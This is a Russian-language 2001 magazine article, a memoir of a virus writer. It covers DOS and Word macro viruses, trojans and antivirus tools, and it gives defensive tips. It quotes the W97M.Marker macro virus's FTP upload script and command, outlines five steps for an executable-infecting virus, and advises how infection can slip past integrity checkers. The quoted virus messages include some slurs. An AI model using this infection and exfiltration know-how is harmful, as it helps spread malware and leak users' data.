>>РАЗ ТРОЯН, ДВА ТРОЯН...

Автор: Internet Maniac aka Алексей Павленко.

Публикации: "Раз троян, два троян (часть первая)", SoftTerra (29.08.01).
"Раз троян, два троян (часть последняя)", SoftTerra (30.08.01).

Вы сталкивались с вирусами и троянами? Вопрос, наверное, риторический. А как вы относитесь к людям, которые их пишут? Лично у меня раньше слова "хакер" или "вирус" ассоциировались с чем-то запредельно умным и даже вызывали некоторое чувство зависти. Услышишь фразу: "Вон, смотри, хакер пошел", произнесенную почему-то шепотом, и провожаешь человека взглядом, как будто это был сам Билл Гейтс.

Сейчас я скорее про себя улыбнусь, если такое услышу. А все потому, что большинство так называемых хакеров – люди, которые едва научились пользоваться программами для подбора паролей. Ну, а вирус и троян создать может каждый, кто немного знаком с программированием файловых операций и сетевого взаимодействия соответственно.

Десять лет назад... На каждом компьютере стоит Aidstest от доктора Лозинского (других антивирусных программ просто нет, или они слишком избирательны). Вирусная база на несколько сотен вирусов, причем все они по большей части уникальные и известные людям. Летом 1994 года выходит первая версия DrWeb. Через два года эта программа ловит уже несколько тысяч вирусов. Появляются известные Demiurg, OneHalf, а примерно за год до этого начинают плодиться макровирусы. Постепенно написание вирусов из своего рода искусства превращается в переделку чужих исходников. Кстати, этому немало способствовал популярный киевский электронный журнал "Infected Voice" (хотя стоит заметить, что редакция этого издания как раз пыталась объяснить, что вирусы не стоит писать ради вредительства).

Вернемся к делам минувших дней. Ореол загадочности, окружавший вирусы, привел к тому, что я и сам захотел написать парочку. А однажды, кажется, в "Технике – Молодежи", я натолкнулся на интервью с "вирмейкером". Журналист, в лучших традициях шпионских фильмов, встретился с молодым человеком, который написал несколько вирусов, попавших в базу данных DrWeb (крутизна какая!). Молодой человек собирался создать еще один, выводящий из строя навороченный монитор известной фирмы, потому что, по его словам, "некоторые из них сильно умными стали". В постскриптуме к статье говорилось, что это ему удалось. Вот именно после этого я твердо решил, что напишу вирус. Что-то поломать, разрушить – это же так круто! Тем более, это могут сделать лишь избранные. А как приятно для самолюбия будет запускать у себя на компьютере антивирусную программу, сообщающую, что на диске мой вирус... Примерно так я тогда думал.

В конце концов ко мне попал исходный текст на Паскале HLLP.Destroy. После небольших модификаций вирус перестал обнаруживаться антивирусными программами. Это была первая цель, к которой я стремился. Я не люблю плагиата, поэтому затем серьезно переделал код, немного добавив ассемблера, однако в основе оставался Destroy. К моменту окончания "работы", наверное, все окружающие были в курсе, что я написал вирус. Я опробовал его в родном университете, и представьте мое удивление, когда он стал множиться не по дням, а по часам. Но вскоре эйфория сменилась противоположным чувством, потому что программа вышла из под контроля. В нее было встроено несколько вещей, мешающих работе на компьютере. Многим это не понравилось, а к кому обращаться, все знали. Доходило до того, что ко мне подходили незнакомые люди и спрашивали, как удалить вирус. Я не вредитель, поэтому предусмотрел небольшую страховку: если в системе прописать необходимую переменную окружения, вирус аннулируется. Однако я не учел тот факт, что у меня не было доступа во все аудитории, к тому же на компьютерах водились и другие вирусы, вступающие во взаимодействие друг с другом и в результате разрушающие исполнимые файлы.

Через некоторое время DrWeb стал ловить мой вирус, потому что я его сам и послал в "Диалог-Науку". Сбылась следующая мечта, но не скажу, что я был особенно рад этому. Эпидемию удалось остановить, пережив несколько неприятных моментов, после чего я решил больше не выпускать вирусы в "свободное плавание". У этой истории было еще продолжение: где-то через год вирус опять появился, но один старшекурсник буквально за "пару" написал к нему антивирус (!).

Со временем все забылось, а я стал автором еще нескольких вирусов, уже не используя ничьи наработки и попав тем же способом в DrWeb. Однажды просто ради интереса решил засечь, сколько времени уйдет на написание простенького вируса на не самой быстрой машине с установленным Паскалем. Оказалось, что меньше двух часов.

Вообще, если не требуется рекордов по размеру полученного кода и затратам места в памяти, то Turbo Pascal – лучший продукт для написания вируса. Для удобства я писал в среде седьмого Паскаля, а компилировал уже в 5.5, потому что код после него был минимальным, после чеого еще сжимал PkLite. Впрочем, что такое 5-6 килобайт на дисках в сотни мегабайт тогда, а сейчас в десятки гигабайт? А вирус, написанный для ДОСа, будет отлично работать и в DOS, и в Windows 3.0-2000.

Как-то раз я решил попробовать написать вирус в Delphi. Сначала ужаснулся размерами консольных приложений, а потом совместимостью. Все переделал, но оказалось, что с налета программа не работает. Дело в том, что Windows-приложения, если они в данный момент запущены, не позволяют изменять свой код. У меня так и не получилось написать полноценный вариант (если, конечно, не задаваться целью создать вирус-вандал, просто переписывающий начало чужого исполнимого файла). Видимо, не хватило знаний. Кстати, про знания: пока писал вирусы на Паскале, превосходно научился работать с файлами, что очень помогло на экзаменах :).

Теперь про обнаружение вирусов. По своему опыту могу сказать, что после небольших переделок тех же "вредоносных" программ антивирусы вроде DrWeb не помогут, надо использовать только резидентные сканеры. Кроме непосредственных сканеров вирусов, существует класс программ, отслеживающих изменения файлов и файловой системы. О возникающих подозрениях сообщается пользователлю. Лучшей такой программой я считаю ADinf32. Я настроил ее так, что после анализа файлов новые автоматически проверяются DrWeb, но даже один ADinf32 превосходно справляется со своей задачей. Для теста я переписал на дискету исполняемый файл, с помощью ADinf32 подсчитал его контрольную сумму, после чего запустил вирус. А потом повторно запустил ревизора. Понятно, что мне тут же было объявлено о потенциальном наличии вирусов. Немного подумав, я решил, что тут что-то не так. Ведь есть программы, не являющиеся вирусами, которые модифицируют свой исполнимый файл, например, записывая в конец зашифрованные пароли, но вряд ли на них будет ругаться ревизор. Повторил свой тест, только теперь вместо вируса вручную изменил код программы-жертвы. Ничего не произошло, ADinf32 пометил, что файл изменился, но мало ли... Потом я понял! Чтобы скрыть свое присутствие, я писал вирус так, чтобы после заражения он восстанавливал старые файловые атрибуты, время создания и модификации. Ревизору стало подозрительно, что размер файла увеличился, а вот время не изменилось. Отсюда вывод: если просто заражать файлы без восстановления второстепенной информации, больше шансов, что вирус не обнаружат. Человек полагается на специализированное программное обеспечение, вот и весь сказ.

EXE-вирусы я давно не писал – надоело. Интересно было бы попробовать CIH, но боязно. А вот макро-вирусы – другое дело. Опять повторилась старая история: я не знал Basic, который используется для этих целей, но ко мне на компьютер попал W97M.Marker. Антивирус сказал, что normal.dot и один из файлов заражен. Я лечить не стал, решив во всем разобраться сам. Почитал Help о том, как вообще писать макросы. Оказалось, что довольно просто. После нажатия Alt-F11 запустился MS Visual Basic, в котором я и увидел текст вируса. Наперед скажу, что можно заблокировать показ кода макроса, что используется в других вирусах. После распечатки на две страницы и пары дней работы была готова модификация Marker, которая (ну естественно!) не распознавалась DrWeb и Spider (не будет же он на все макросы ругаться). Думаю, что так сейчас и пишутся вирусы.

Зараженный файл был помещен в архив моей вирусной коллекции и поставлен на пароль. Снова вирус помог мне разобраться в языке программирования, я понял, что писать такие штуки очень легко и потерял к этому делу интерес. Но у истории опять было продолжение! Месяцев через шесть ко мне обратился один человек и спросил, не менял ли я настройки Word у него на компьютере. Менять его настройки мне было незачем, но далее он назвал признак, по которому я сразу понял, что это ОН. Отличительная черта Marker – вирус модифицирует текст макроса, добавляя в комментарии имя пользователя Word. Таким образом, можно точно проследить путь распространения вируса. К обратившемуся человеку он попал с компьютера, на котором макрос и был написан, не от меня. Было интересно читать цепочку движения вируса по пользователям. Никого из них я не знаю, как и хозяин компьютера. Да, забыл сказать, AVP тоже не ловил вирус. И еще интересная деталь: макрос был написан совсем в другом городе, а все-таки нашел меня. Не помогли никакие антивирусные настройки Word.

Помнится, раньше Игорь Данилов (автор DrWeb) вел файл VIRLIST.DWB, в котором описывалась работа вирусов. Для меня чтение этого файла приятнее "Лучшей десятки анекдотов". Там встречаются такие перлы! Кто-то ведет переписку с авторами программы DrWeb, кто-то обзывает начальника и врагов, а отдельные кадры признаются в любви и поздравляют себя с днем рождения. Особенно длинная история общения в серии вирусов Doggy. Есть даже довольно интересные стихи, а качество псевдографики вызывает глубокое уважение. Такое впечатление, что над некоторыми вирусами работала команда, состоящая из программиста, художника-дизайнера и, скажем, литератора или музыканта. В конце статьи образцы этого народного творчества.

Было бы ошибкой считать, что вирусы обязательно должны форматировать жесткий диск, выжигать люминофор монитора или разрушать головки дисковода. Вирус – обычная программа, особенность которой лишь в том, что она стремится размножиться, заключая свой код в чужие файлы. И если внимательно почитать VIRLIST.DWB, то там можно обнаружить совершенно четкие инструкции по написанию вирусов. Может, из-за этого сей файл давно не обновлялся? :)

Для защиты от вирусов я рекомендую установить три программы, которые могут даже входить в один антивирусный пакет. Нужен дисковый ревизор, резидентный сканер и обычная программа для поиска вредителей. Антивирусы могут помочь в 99% случаях. Оставшийся процент резервируется под новинки и слегка переделанные исходники. Впрочем, если вам кто-то действительно хочет досадить, то он сделает это, не сомневайтесь!

О стоимости. Все стоит денег, однако производители антивирусного программного обеспечения все чаще предлагают полные работоспособные версии бесплатно. Единственное "но": так они будут функционировать лишь ограниченный промежуток времени. Потом надо скачивать новую версию или брать ее с компакт-дисков, распространяемых с журналами.

Рис.1. Установка подтверждения запуска макросов

Рис.2. Само подтверждение

Чтобы защититься от макровирусов, достаточно включить подтверждение запуска макросов (в Office 2000 по умолчанию вообще запрещен их запуск) и сохранения изменений normal.dot. Если вы открываете документ Офиса, а программа предупреждает, что файл содержит макросы, то советую вначале отключить их запуск, а потом нажать Alt-F11 и попробовать посмотреть код. Если он окажется скрытым, то лучше вообще стереть файл.

Рис.3. Читаем тело вируса

Хочу предостеречь, что не всегда антивирусы находят действительно вирусы. И это не удивительно, потому что в современные пакеты встроена возможность поиска модификаций вирусов или даже их новых версий (так называемый эвристический анализ). Учитывать надо еще тот факт, что в программе не хранятся исходные тела вирусов, ведь тогда размер базы будет составлять мегабайты! Процедуры заражения файлов очень похожи, чем и пользуются создатели антивирусных программ. Посудите сами, дополнения к DrWeb занимают по несколько килобайт, а с их помощью можно ловить гадов на сотню-другую больше.

Некоторое время назад мой товарищ скачал последнюю версию одного популярного антивируса и дополнения к нему. Запустил проверку, и программа сразу нашла пару подозрений на вирусы. Вылечить не смогла, зато успешно удалила файлы после согласия. Через минуту еще подозрения, и еще... Товарищу надоело нажимать кнопку с подтверждением, и он настроил программу на удаление всех "плохих" файлов. А потом антивирус подвел итоги и сообщил, сколько всего он нашел подозрений. Много нашел. Стал товарищ разбираться, от кого занес заразу. Оказалось, что программа ругалась на все файлы, откомпилированные Турбо Паскалем, без разбора: лабораторные, курсовой и т.д. Товарищ написал письмо в службу технической поддержки, в вежливой форме сообщил о проколах в программе и потерянных файлах. "Да", – ответила почти сразу техподдержка, – "Есть такой глюк, но мы его только что исправили. Вот, возьмите дополнение". Как вы думаете, что товарищ сделал с антивирусом после этого?

А теперь давайте разберемся с троянами. Трояны, или троянские кони, – тоже обычные программы, причем по написанию они проще вирусов, так как не несут в себе возможности размножения. Особенность такой программы заключается в том, что она передает данные пользователя другому человеку. Сам я не встречал, но вполне могу принять факт существованияия вируса и трояна в одном лице. Уже упомянутый в предыдущей части макровирус W97M.Marker несет в себе элементы трояна. Маркер создает в корневом каталоге файл netldx.vxd, который потом исполняет:

o 209.201.88.110"
user anonymous"
pass itsme@"
cd incoming"
ascii"
Тут находится список пользователей, через которых прошелся вирус
quit"

command.com /c ftp.exe – n – s:c:\netldx.vxd

Отсюда видно, что макрос передает на некий ftp-сервер информацию, а в ней может находиться ваше имя и адрес (если указывали в MS Office).

Это был простой пример, в котором использовались стандартные средства операционной системы для работы по сети. Трояны вообще чаще всего предназначены для сетевого взаимодействия, иначе как передать полученную информацию (например, пароли)? В крайнем случае программа может собирать данные, а потом человек, ее запустивший, непосредственно с компьютера-жертвы заберет результат. Но это совсем неинтересно. Так что если вы не подключены к сети и никого не пускаете за свой компьютер, можете быть относительно спокойны.

Часто трояны используют для другой цели – они помогают захватить управление над вашим компьютером. Для этого обычно применяется Back Orifice. Мне он не нравится, потому что не работает под Windows NT/2000, поэтому расскажу о возможностях троянцев на другом примере.

Сижу я как-то в университете за компьютером, делаю лабораторную. Рядом одногруппники занимаются тем же самым. Вдруг у одного из них компьютер перегрузился. Понятное дело, Windows, но через минуту опять перегрузился без причины. А потом на экране возникает надпись: "Что, Вася, лабы делаешь?". Мы народ грамотный, сразу поняли в чем дело, стали искать в памяти программу-троян. Обнаружили и удалили процесс. Через минуту у другого соседа экран погас. Естественно, про лабораторную сразу забыли. Заинтересовались, кто это над нами шутит. Сразу скажу, шутника не нашли (жалко, не было с собой нужных утилит). Зато нашли исходники троянца то ли на Delphi, то ли на C++ Builder.

Троянец состоял из двух частей: серверной и клиентской. Серверная управляла одной или несколькими клиентскими частями. Работало все очень просто. На компьютер переписывался клиент, который прятался куда-нибудь в каталог Windows. Он запускался невидимым окном каждый раз при загрузке ОС и опрашивал сетевой порт на получение данных. На другом компьютере запускалась серверная часть. Там указывался IP-адрес клиента. Если соединение с ним происходило, то можно было управлять удаленным компьютером. Нажмешь кнопку "Выключить монитор", по сети пошлется соответствующая текстовая строчка. Клиент примет ее и сделает то, что ему сказали. Кроме этого, он мог по запросу передать список запущенных приложений, файл, перегрузить/выключить компьютер, открыть или закрыть CD-ROM. Для последнего в программе использовался MediaPlayer (!!!) и десяток строчек кода. Про системные вызовы автор не знал. В общем, чтобы его написать, достаточно почитать Help по использованию компонентов TServerSocket и TClientSocket, а также изучить Delphi.FAQ. В последнем подробно написано, как выключать монитор. Странно, но почему-то это довольно популярный вопрос у пользователей.

Если немного расширить описанную программу, можно получать снимок экрана, двигать чужой мышью или "нажимать" клавиши клавиатуры. Забавный момент был, когда я сам читал Delphi.FAQ. Делал я тогда программу для общения по локальной сети (она получилась гораздо мощнее неудобного WinPopup, но почему-то популярности не завоевала). Встроил я в нее шутку – раз в 5 минут у пользователя открывался и закрывался CD-ROM. Теперь представьте картину: человек (один в комнате) запустил мою программу для общения, болтаем ни о чем, а я смотрю на часы. И тут пауза, что такое? Человек очень испугался, что у него в памяти сидит троянец, позакрывал все программы (кроме моей!) и стал вирусы искать всеми доступными средствами. Тут еще пять минут проходит, опять диск выехал. Парень прибегает ко мне за диском с антивирусами. Мы с соседом еле сдержались, чтобы не рассмеяться при нем. Через минуту я шутку убрал и выставил в сеть нормальную версию программы. Парень в конце концов догадался, что я виноват, но в чем именно было дело, так и не понял. Несколько дней спрашивал, в какую программу я ему троянца заслал.

Под каким видом распространяют троянских коней? Я встречал генератор троянцев. Несколькими нажатиями мыши создается файл zip.exe, у которого будет аналогичная иконка. Теперь его можно послать по электронной почте. При запуске инсталлируется клиентская часть, а чтобы пользователь ничего не заметил, программа вылетает с сообщением, что файл поврежден. "Бывает, не в первый раз закачка обрывается", – подумает человек и сотрет zip.exe. Вот и все, его компьютер под контролем.

Существуют специализированные программы для поиска троянов. Одна из их возможностей – сканирование используемых портов, на которых может висеть программа для получения инструкций. Возможно, я ошибаюсь, но, по-моему, для этого можно воспользоваться программой netstat.exe, входящей в поставку Windows.

Рис.4. Смотрим открытые порты

Как видно из рисунка 4, на компьютере прослушивается несколько портов. Среди них http-сервер и другие стандартные службы. А вот порты 2020 и 2050 вызывают подозрение. Тем более, к 2020 кто-то присоединился. Хотя название компьютера одно и то же, кто знает, может на нем сразу и серверная часть троянца установлена?

Напоследок – схема написания простейшего вируса за 5 шагов:

Давайте договоримся, что в самом начале есть файл virus.exe, который получается при компиляции. И есть просто program.exe. virus.exe – обычная программа, при запуске она копируется в оперативную память, а там уже выполняется. По шагам рассмотрим что будет, если запустить virus.exe или зараженный program.exe.

Шаг 1 (поиск): Ищем другой program.exe (пропускаем virus.exe). Проверяем его последний байт. Если это буква V, то файл уже заражен. Переходим к шагу 1. Иначе шаг 2.

Шаг 2 (заражение): Читаем 10000 байт program.exe и записываем их в конец, после этого еще добавляем букву V. Читаем 10000 байт своего файла (который сейчас запустили), пишем их вместо начала program.exe. Если длина вируса была 10000 байт, а program.exe – 1000000, то после заражения размер полученного файла составит 10010001 байт.

Шаг 3 (восстановление файла): Если имя исполнимого файла virus.exe, то прекращаем работу. Задача выполнена: чужой файл мы заразили. Теперь сделаем так, чтобы пользователь не заметил, что у него вирус. Надо восстановить зараженный файл. Удаляем последний файл из своего исполнимого файла, читаем последние 10000 байт и записываем их в самое начало. Этим мы восстановили зараженный файл. Можно еще вернуть первоначальные атрибуты и файловое время.

Шаг 4 (запуск): Используя системный вызов, запускаем свой файл.

Шаг 5 (обратное заражение): Когда программа отработает, она вернет управление вирусу, запустившему ее. Он уже знает свой код и начальные 10000 байт program.exe. Просто заново пишет начало program.exe в конец файла, добавляет V, а свой код – в начало program.exe.

Все. Вирус заразил чужую программу, дал пользователю запустить приложение. При желании шаг 5 можно пропускать. Тогда получится вирус-спутник, блуждающий по дискам жертвы.

А теперь примеры текстовых записей, которые выводят вирусы.

Вставьте в дисковод наждачную бумагу и наберите FORMAT A: /S/U
Если у вас простаивает комп, наберите HA AR012 HA C:\*.*
Мы все живем для того, чтобы завтра сдохнуть.
Остановите винчестер!!!! Ну вот, уже поздно...
(c) HLLO.Hacks

Вас приветствует Vs&W Hackers Group
Ради интереса мы написали этот вирус
Прошу дать ему название "VS&W", пожалуйста!!!
Ждите новых поступлений от хакеров Санкт-Петербурга
Вирус написано на Турбо Паскале 7.00, и упакован DIET`ом
Привет MiXER`у от MadMax`а
MiXER ты еще на Бэйсике страдаешь или нет?
(c) HLLO.Vs&W.3836

SHUTKA GLUPISHI !
Today is ГУУД ДОГГИ's БИРЗДЭЙ !!!
superskie igrushki: Zuganov - borodavka
super digger acade voleybol
Wi mojete ih kupit besplatno na beloye pivo bbs
zvoniti nam vsegda!!! ass-hole
etu programu napIsal KHARITONOV SASHKA
+7 (095) 135-62-53 (sasha)
ТОЛЬКО для вирмэйкеров -> у меня АОН
Ja nichego voobshe ne bous! Mne 7 let, ja talant!!
gorod moskva, storona zugoslavia ...
┌─── ХАРЯ ────────┐
│Данилофф привet! │
│Я просто прикалываюсь с моей igrushkou! │
└─────────────────┘
нам конешно нравится веб, но он тормозит!
ЛОХинскай! неужели ты досихпор не мозешь мойпать иванхальф?
Как насчет exterface для лозатеста?
а том этот НЕГР С БЕЛЫМИ БУКАМИ!
привет КСПЕРМА IVGENYJ!
izvini chto tak nazivau, просто у тебя prikolнаяя фамилия!
mOGU POJERTVOVAT NA PIVO BBS 100 $$$$ B/W DOLLAROV
(c) HLLP.Doggy.6686

Санкт-Петербургский
Футбольный клуб "ЗЕНИТ"!

                        FAN CLUB 33

          Лучше клуба нам не надо, чем ЗЕНИТ из Ленинграда
┌──────────────────────────────────────────────────────────────────────┐
│                   З Е Н И Т     -    F O R E V E R                   │
└──────────────────────────────────────────────────────────────────────┘
Владимир Кулик, Игорь Данилов (футболист, а не вирусолог), Денис Зубко
Борис Матвеев, Сергей Дмитриев, ... , и, конечно же, П.Ф. Садырин
(c) HLLP.Zenit

С днем рожденья,

                     
                                  
                           
                              
                                 
(c) Katya.732

 !!! ВЫРУСС !!! 
 УХ КАК СТРАШНО 

(c) LittleBoy.944

 ██ ███ ██  █ █ █  ███ █ █ ██   █
█   █   █ █ █ █ █   █  █ █ █ █ █ █
█   █   █ █ █ █ █   █  █ █ █ █ █ █
███ ███ ██  █ █ █   █  █ █ ██  ███
  █ █   █   █ █ █   █  █ █ █ █ █ █
  █ █   █   █ █ █   █  █ █ █ █ █ █
██  ███ █   ██  ███ █  ██  █ █ █ █
             CHAOS A.D.
(c) Megadeth.Sepultura

# Bupyc-MEHT, v1.0     (C) MBD Poccuu. XI.1996 #
# АЛЛО, МИЛИЦИЯ ! Я, ГРЯЗНЫЙ ЮЗЕР, УКРАЛ У БИЛЛИ ОКОШЕЧКИ !
# С #овым 1937-м годом, совковый киберспэйс !
# Да, здравствует российская милиция° и другие деревянные изделия...
(c) Meht.1317

Заранее прошу извинения.
Чистая случайность, что ЭТО попало к Вам.
По классификации Е. Касперского это типи-
чная  "студенческая"  программа, причем в
наихудшем ее исполнении:
 - портит оверлеи ( если не повезет, то и
  резиденты тоже ),
 - портит забитый до отказа диск,
 - содержит большое число ошибок,
 - имеет большой размер,
 и т.д.
Чего еще можно ожидать от студента МИРЭА.
Ничего  гадкого ,  кроме  распространения
программа  не  делает ( я на это надеюсь,
хотя от "студенческой" можно ожидать все-
го из-за ее крайней примитивности и боль-
шого числа ошибок ).

        МИРЭА - хороший ВУЗ!!!
      МИРЭА - это звучит гордо!!!
 МИРЭАзм не объяснить, в нем надо жить!!!
(c) MIREA.4156

Работу программистам!
(c) MISiS

Осторожно - на борту бомба!         Зачем звал ,Хозяин ?
В дисководе А: две дискеты !!       В дисководе КРЫСЫ !!!
Храните деньги в банке !!           Кто там ? Это я, Чикатило!
Лучше пива только ФАВТ !!!          Да выключите свет наконец!
Извините, а как вас зовут ?         Ваше место дома на диване !
Can you FUCK me ?  May be !         СНИКЕРС - как у негра в ...
Пиво не роскошь, а средство !       Press CTRL-ALT-DEL ...
AIDSTEST не поможет !               TWIX - то, чего у вас нет!!!
Invalid user. Unknown error !       BOUNTY - нас любят все !!
Good user   -   Dead user !!!       MILKYWAY утонул !
COMMAND.COM умер! Press key..       Запустите AIDSTEST !!!
Яна мы тебя любим !!!               У Вас плохой мотор !
Insert new user and press ESC       Читайте газету БИЗНЕС !
Пробоина в диске C:,прощайте!       Морг рядом !!!
Дядя Вася дом покрасил !            Crazy & Co. ltd.
Прочитайте что такое вирус !        Поздравте меня с зачетом !!!
Вышел чукча на крыльцо . . .        LISP - das is круто !
Лозинского на мыло !!!              Insert new baks into drive A:
Данилов, мы тебя не уважаем.        ... Пить ... Дайте воды ...
Пропал Снупи,ушел на болото..       Меняю жену 40 лет на 2 по 20!
I'm big RUSSIAN monstr !!           Залипание клавиатуры!
System error, invalid TC.EXE.       Утро вечера - мудренее !!!
See you later ...                   Я НЕ ПОБЕДИМЫЙ !!!
Белые братья хуже голубых...        Не хочу !
Что смотришь, придурок !?           CPU мертв.А FPU не заводится.
Лучше я чем другой, правда?         ЛЕНИН ЖИВ !!!
Вентилятор is write protected       СТАЛИН УМЕР, НО ДЕЛО ЖИВЕТ !!
Formatting disk C: y/y  ?           Надейтесь на лучшее !
&^%&^%&#^ - подумал Штирлиц !       Горбачев - сволочь !!!
Анекдот : Колобок повесился !       Ухожу в моностырь (женский)!
Мне нужно срочно позвонить !        Покрась и выбрось !!!
Не занимай левый ряд !!!            Выпил пива - писай криво!
Осторожно ,злой USER ! ! !          Guns 'N' Roses это круто !
Конец работы ,ты свободен .         Посмотри на часы !!!
У вас пена изо рта идет !           Сколько там времени ?
Всем молчать   ! ! !                (C) Porno C++ 3.1
Я хочу  КРОВИ !!!                   (C) Гиви Basic 7.0
Я хочу  МЯСА  !!!                   (C) Trubo Pascacal 7.0
Я хочу спать, отруби машину !       Играйте в DOOM III  !
Я маньяк Чикатило !!!               Все ! Конец света !!!
Матерь мира - М.Д. Христос !!       Женщины, не пейте водки !
УРА ! НОВЫЙ ГОД !!!                 Где твоя босая ножка ?
КМУГА - полигон вирусов !           Тьфу... -> Плевательница !?;
Да обломайся ты !                   ФАРЭО ЧЕМПИОН !!!
Не морочь голову !!!                Virus detected, system halted
Как вам вирусок? Фигня, фигня       Акции АО ~МММ~ упали !!!
Солнце встанет непременно !!!       Keyboard error, press F1.
Это не сон, это SONY!               TAMPAX - райское наслаждение.
Секретный диск X: установлен        А ты записался в КМУГА ???
Вы должны мне 10000 рублей !        Выпьем Водки Ваня ...
(c) Maverick.Nostardamus.5995

                          ▐▒▒▒▒▒▒▒  █▒▒▒▒▒
        ░                 ▐▒▒▀▀▀▀▀ ▐▒▒  ▐▒▒                 ░
       ░▓█                ▐▒▒      ▐▒▒  ▐▒▒                ░▓█
      ▒░▓█▒                █▒▒▒▒▒  ▐▒▒  ▐▒▒               ▒░▓█▒
   ░░▓█░▓█░▓█░              ▀▀▀▀▒▒▒▐▒▒  ▐▒▒            ░░▓█░▓█░▓█░
     ░█░▓█▒█                    █▒▒▐▒▒  ▐▒▒              ░█░▓█▒█
      ▒░▒░▒               ▐▒▒   █▒▒▐▒▒  ▐▒▒               ▒░▒░▒
     ░▓█ ░▓█               █▒▒▒▒▒▒█ █▒▒▒▒▒               ░▓█ ░▓█
    ░       ░               ▀▀▀▀▀▀   ▀▀▀▀               ░       ░

          ╔══╗             ╔═══╗                 ╔══╗
          ║  ║             ║   ║                 ║  ║
         ╔╝  ║ ╔═══ ══╦══  ║   ║ ╔══╗ ╔═══ ╔═══  ║  ║  ╦    ╦
         ║   ║ ╠═     ║    ║   ║ ║  ║ ║══╗ ╠═    ║  ║  ╠══╗ ║
         ║   ║ ║      ║    ║   ║ ║  ║ ║  ║ ║    ╔╩══╩╗ ║  ║ ║
         ╩   ╩ ╚═══   ╩    ╩   ╩ ╚══╝ ╚══╝ ╚═══ ╩    ╩ ╚══╝ ╩

 Б Е Й  Ф А Ш И С Т О В !!! З А  Н А Ш У  С О В Е Т С К У Ю  Р О Д И Н У !

                     З а  С т а л и н а  и  П а р т и ю !!!
(c) Ssr.1945

                              Четвертой кафедре радиофизики посвящается.

                                     Я Фортран бы выучил только за то,
                                     что на нем защищался декан мой.

 О, хакеры и программисты,             От необузданной той страсти
 познанье кода - путь тернистый        пойдут и горе и напасти,
 и есть ваш крест. Позвольте ж мне     и не насытит вас тогда
 означить путь вам в этой мгле.        ООП-овская ерунда.

 Пишите только на Фортране,            ООП, рекурсии, структуры
 иль назовут вас сосунками,            сгодятся только насмех курам,
 коль захотите вы в запале             когда пред вами встанут коды,
 попробовать себя в Паскале.           всплывут утраченные годы...

 Пишите с толком, аккуратней,          Ну что ж, сидите, жмите кнопки,
 чем больше GO TO, тем приятней,       глазейте на цветные попки,
 и боже вас оборони                    хоть не познали вы авоста,
 использовать при этом Си.             все ж вам привет от Эда Поста.

                           Есть надежда, что еще можно спастись.
(c) Teacher.2000

Пpивет, я - безобидный виpyс Bobby Friday.
Я не пpичиню вpеда вашемy компьютеpy
Я только бyдy говоpить по пятницам, что
моемy автоpy очень нpавится девyшка по имени СВЕТА.
(c) Bobby.613

ps С вирусами бороться бесполезно, прошел почти год с момента написания этой статьи, антивирусы стали лучше, пользователи умнее, а вот я поймал Klez. Вроде бы и Spider висел со всеми доступными обновлениями, а вирусяку пропустил. Вроде убрал все его следы, посмотрим, что будет дальше...